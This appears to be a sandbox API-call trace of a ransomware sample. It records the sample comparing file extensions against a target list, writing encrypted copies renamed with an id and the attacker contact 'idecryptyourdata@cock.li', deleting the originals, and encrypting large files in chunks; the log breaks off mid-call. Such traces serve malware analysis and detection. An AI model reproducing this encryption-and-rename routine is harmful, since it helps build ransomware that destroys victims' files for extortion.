[0047.243] lstrlenW (lpString=".1cd") returned 4 [0047.243] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.243] lstrlenW (lpString=".jpg") returned 4 [0047.243] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.243] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.244] lstrlenW (lpString=".doc") returned 4 [0047.244] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.244] lstrlenW (lpString=".docx") returned 5 [0047.244] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.244] lstrlenW (lpString=".pdf") returned 4 [0047.244] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.244] lstrlenW (lpString=".xls") returned 4 [0047.244] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.244] lstrlenW (lpString=".xlsx") returned 5 [0047.244] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.244] lstrlenW (lpString=".ppt") returned 4 [0047.244] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.244] lstrlenW (lpString=".zip") returned 4 [0047.244] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.244] lstrlenW (lpString=".rar") returned 4 [0047.244] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.244] lstrlenW (lpString=".bz2") returned 4 [0047.244] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.244] lstrlenW (lpString=".7z") returned 3 [0047.244] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.244] lstrlenW (lpString=".dbf") returned 4 [0047.244] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.244] lstrlenW (lpString=".1cd") returned 4 [0047.244] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.244] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0047.244] lstrlenW (lpString=".jpg") returned 4 [0047.837] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.837] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.837] lstrlenW (lpString="stop.ico") returned 8 [0047.837] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0048.084] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=10134) returned 1 [0048.084] CloseHandle (hObject=0x32c) returned 1 [0048.084] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 0x80 [0048.084] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.084] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0048.084] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.084] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.084] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0048.085] GetLastError () returned 0x0 [0048.085] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x2796, lpOverlapped=0x0) returned 1 [0048.086] WriteFile (in: hFile=0x330, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x27a0, lpOverlapped=0x0) returned 1 [0048.087] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.087] WriteFile (in: hFile=0x330, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xe4, lpOverlapped=0x0) returned 1 [0048.087] SetEndOfFile (hFile=0x330) returned 1 [0048.088] CloseHandle (hObject=0x330) returned 1 [0048.089] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.089] SetEndOfFile (hFile=0x32c) returned 1 [0048.090] CloseHandle (hObject=0x32c) returned 1 [0048.090] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.090] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 1 [0048.090] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.090] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.090] lstrlenW (lpString=".doc") returned 4 [0048.090] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.090] lstrlenW (lpString=".docx") returned 5 [0048.091] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0048.091] lstrlenW (lpString=".pdf") returned 4 [0048.091] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.091] lstrlenW (lpString=".xls") returned 4 [0048.091] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.091] lstrlenW (lpString=".xlsx") returned 5 [0048.091] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0048.091] lstrlenW (lpString=".ppt") returned 4 [0048.091] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.091] lstrlenW (lpString=".zip") returned 4 [0048.091] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.091] lstrlenW (lpString=".rar") returned 4 [0048.091] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.091] lstrlenW (lpString=".bz2") returned 4 [0048.091] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.091] lstrlenW (lpString=".7z") returned 3 [0048.091] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.091] lstrlenW (lpString=".dbf") returned 4 [0048.091] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.091] lstrlenW (lpString=".1cd") returned 4 [0048.091] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.091] lstrlenW (lpString=".jpg") returned 4 [0048.091] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.091] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.091] lstrlenW (lpString=".doc") returned 4 [0048.091] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0048.091] lstrlenW (lpString=".docx") returned 5 [0048.091] lstrcmpiW (lpString1=".docx", lpString2="p.ico") returned -1 [0048.091] lstrlenW (lpString=".pdf") returned 4 [0048.091] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0048.091] lstrlenW (lpString=".xls") returned 4 [0048.091] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0048.092] lstrlenW (lpString=".xlsx") returned 5 [0048.092] lstrcmpiW (lpString1=".xlsx", lpString2="p.ico") returned -1 [0048.092] lstrlenW (lpString=".ppt") returned 4 [0048.092] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0048.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.092] lstrlenW (lpString=".zip") returned 4 [0048.092] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0048.092] lstrlenW (lpString=".rar") returned 4 [0048.092] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0048.092] lstrlenW (lpString=".bz2") returned 4 [0048.092] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0048.092] lstrlenW (lpString=".7z") returned 3 [0048.092] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0048.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.092] lstrlenW (lpString=".dbf") returned 4 [0048.092] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0048.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.092] lstrlenW (lpString=".1cd") returned 4 [0048.092] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0048.092] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 39 [0048.092] lstrlenW (lpString=".jpg") returned 4 [0048.092] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0048.092] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0048.092] lstrlenW (lpString="SysReqNotMet.ico") returned 16 [0048.092] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0048.093] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=1150) returned 1 [0048.093] CloseHandle (hObject=0x32c) returned 1 [0048.093] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 0x80 [0048.093] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.093] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0048.093] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.093] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.093] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0048.093] GetLastError () returned 0x0 [0048.093] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x47e, lpOverlapped=0x0) returned 1 [0049.063] WriteFile (in: hFile=0x330, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x480, lpOverlapped=0x0) returned 1 [0049.064] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0049.064] WriteFile (in: hFile=0x330, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0xf4, lpOverlapped=0x0) returned 1 [0049.064] SetEndOfFile (hFile=0x330) returned 1 [0049.064] CloseHandle (hObject=0x330) returned 1 [0049.065] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.065] SetEndOfFile (hFile=0x32c) returned 1 [0049.066] CloseHandle (hObject=0x32c) returned 1 [0049.066] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0049.066] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 1 [0049.066] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.066] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.066] lstrlenW (lpString=".doc") returned 4 [0049.066] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0049.067] lstrlenW (lpString=".docx") returned 5 [0049.067] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0049.067] lstrlenW (lpString=".pdf") returned 4 [0049.067] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0049.067] lstrlenW (lpString=".xls") returned 4 [0049.067] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0049.067] lstrlenW (lpString=".xlsx") returned 5 [0049.067] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0049.067] lstrlenW (lpString=".ppt") returned 4 [0049.067] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0049.067] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.067] lstrlenW (lpString=".zip") returned 4 [0049.067] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0049.067] lstrlenW (lpString=".rar") returned 4 [0049.067] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0049.067] lstrlenW (lpString=".bz2") returned 4 [0049.067] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0049.067] lstrlenW (lpString=".7z") returned 3 [0049.067] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0049.067] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.067] lstrlenW (lpString=".dbf") returned 4 [0049.067] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0049.067] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.067] lstrlenW (lpString=".1cd") returned 4 [0049.067] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0049.067] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.067] lstrlenW (lpString=".jpg") returned 4 [0049.067] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0049.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.068] lstrlenW (lpString=".doc") returned 4 [0049.068] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0049.068] lstrlenW (lpString=".docx") returned 5 [0049.068] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0049.068] lstrlenW (lpString=".pdf") returned 4 [0049.068] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0049.068] lstrlenW (lpString=".xls") returned 4 [0049.068] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0049.068] lstrlenW (lpString=".xlsx") returned 5 [0049.068] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0049.068] lstrlenW (lpString=".ppt") returned 4 [0049.068] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0049.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.068] lstrlenW (lpString=".zip") returned 4 [0049.068] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0049.068] lstrlenW (lpString=".rar") returned 4 [0049.068] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0049.068] lstrlenW (lpString=".bz2") returned 4 [0049.068] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0049.068] lstrlenW (lpString=".7z") returned 3 [0049.068] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0049.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.068] lstrlenW (lpString=".dbf") returned 4 [0049.068] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0049.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.068] lstrlenW (lpString=".1cd") returned 4 [0049.069] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0049.069] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0049.069] lstrlenW (lpString=".jpg") returned 4 [0049.069] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0049.069] lstrcmpiW (lpString1=".mzz", lpString2=".bat") returned 1 [0049.069] lstrlenW (lpString="netfx_Extended.mzz") returned 18 [0049.069] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0049.069] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=43131591) returned 1 [0049.069] CloseHandle (hObject=0x32c) returned 1 [0049.069] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz")) returned 0x20 [0049.069] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0049.069] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0049.070] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0049.070] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fc64 | out: lpNewFilePointer=0x0) returned 1 [0049.070] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fc24 | out: lpNewFilePointer=0x0) returned 1 [0049.070] ReadFile (in: hFile=0x32c, lpBuffer=0x4026058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x334fc30, lpOverlapped=0x0 | out: lpBuffer=0x4026058*, lpNumberOfBytesRead=0x334fc30*=0x40000, lpOverlapped=0x0) returned 1 [0053.733] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0xdb60ed, lpNewFilePointer=0x0, dwMoveMethod=0x334fc24 | out: lpNewFilePointer=0x0) returned 1 [0053.733] ReadFile (in: hFile=0x32c, lpBuffer=0x4066058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x334fc30, lpOverlapped=0x0 | out: lpBuffer=0x4066058*, lpNumberOfBytesRead=0x334fc30*=0x40000, lpOverlapped=0x0) returned 1 [0054.671] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x334fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.671] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x28e22c7, lpNewFilePointer=0x0, dwMoveMethod=0x334fc24 | out: lpNewFilePointer=0x0) returned 1 [0054.671] ReadFile (in: hFile=0x32c, lpBuffer=0x40a6058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x334fc30, lpOverlapped=0x0 | out: lpBuffer=0x40a6058*, lpNumberOfBytesRead=0x334fc30*=0x40000, lpOverlapped=0x0) returned 1 [0054.687] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0054.687] WriteFile (in: hFile=0x32c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0xc0110, lpNumberOfBytesWritten=0x334fca8, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fca8*=0xc0110, lpOverlapped=0x0) returned 1 [0060.302] SetEndOfFile (hFile=0x32c) returned 1 [0060.302] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43d10e0 [0060.306] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fc74 | out: lpNewFilePointer=0x0) returned 1 [0060.306] WriteFile (in: hFile=0x32c, lpBuffer=0x43d10e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x334fc80, lpOverlapped=0x0 | out: lpBuffer=0x43d10e0*, lpNumberOfBytesWritten=0x334fc80*=0x40000, lpOverlapped=0x0) returned 1 [0060.307] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0xdb60ed, lpNewFilePointer=0x0, dwMoveMethod=0x334fc74 | out: lpNewFilePointer=0x0) returned 1 [0060.307] WriteFile (in: hFile=0x32c, lpBuffer=0x43d10e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x334fc80, lpOverlapped=0x0 | out: lpBuffer=0x43d10e0*, lpNumberOfBytesWritten=0x334fc80*=0x40000, lpOverlapped=0x0) returned 1 [0060.307] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x28e22c7, lpNewFilePointer=0x0, dwMoveMethod=0x334fc74 | out: lpNewFilePointer=0x0) returned 1 [0060.307] WriteFile (in: hFile=0x32c, lpBuffer=0x43d10e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x334fc80, lpOverlapped=0x0 | out: lpBuffer=0x43d10e0*, lpNumberOfBytesWritten=0x334fc80*=0x40000, lpOverlapped=0x0) returned 1 [0060.309] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d10e0 | out: hHeap=0x5d0000) returned 1 [0060.311] CloseHandle (hObject=0x32c) returned 1 [0064.616] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.616] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.616] lstrlenW (lpString=".doc") returned 4 [0064.616] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0064.616] lstrlenW (lpString=".docx") returned 5 [0064.616] lstrcmpiW (lpString1=".docx", lpString2="d.mzz") returned -1 [0064.616] lstrlenW (lpString=".pdf") returned 4 [0064.616] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0064.616] lstrlenW (lpString=".xls") returned 4 [0064.616] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0064.617] lstrlenW (lpString=".xlsx") returned 5 [0064.617] lstrcmpiW (lpString1=".xlsx", lpString2="d.mzz") returned -1 [0064.617] lstrlenW (lpString=".ppt") returned 4 [0064.617] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0064.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.617] lstrlenW (lpString=".zip") returned 4 [0064.617] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0064.617] lstrlenW (lpString=".rar") returned 4 [0064.617] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0064.617] lstrlenW (lpString=".bz2") returned 4 [0064.617] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0064.617] lstrlenW (lpString=".7z") returned 3 [0064.617] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0064.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.617] lstrlenW (lpString=".dbf") returned 4 [0064.617] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0064.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.617] lstrlenW (lpString=".1cd") returned 4 [0064.617] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0064.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.617] lstrlenW (lpString=".jpg") returned 4 [0064.617] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0064.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.617] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.617] lstrlenW (lpString=".doc") returned 4 [0064.617] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0064.617] lstrlenW (lpString=".docx") returned 5 [0064.617] lstrcmpiW (lpString1=".docx", lpString2="d.mzz") returned -1 [0064.618] lstrlenW (lpString=".pdf") returned 4 [0064.618] lstrcmpiW 